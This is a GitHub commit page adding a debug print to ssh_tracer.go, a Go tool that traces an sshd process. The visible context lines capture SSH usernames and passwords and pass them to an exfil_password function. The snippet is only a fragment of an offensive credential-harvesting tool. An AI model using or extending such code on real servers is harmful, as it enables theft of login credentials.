Skip to content

Commit

Permalink
debug: moar debugggg
Browse files Browse the repository at this point in the history
  • Loading branch information
MattKeeley committed Feb 25, 2024
1 parent 8f72b5e commit 28426e4
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions ssh_tracer.go
Original file line number Diff line number Diff line change
Expand Up @@ -59,6 +59,8 @@ func traceSSHDProcess(pid int) {
fmt.Printf("Username: %q, Password %q\n", username, password)
go exfil_password(username, removeFirstFourBytes(password))
}
} else {
fmt.Printf("rdi: %d, rax: %d\n", regs.Rdi, regs.Orig_rax)
}
}
}
Expand Down

0 comments on commit 28426e4

Please sign in to comment.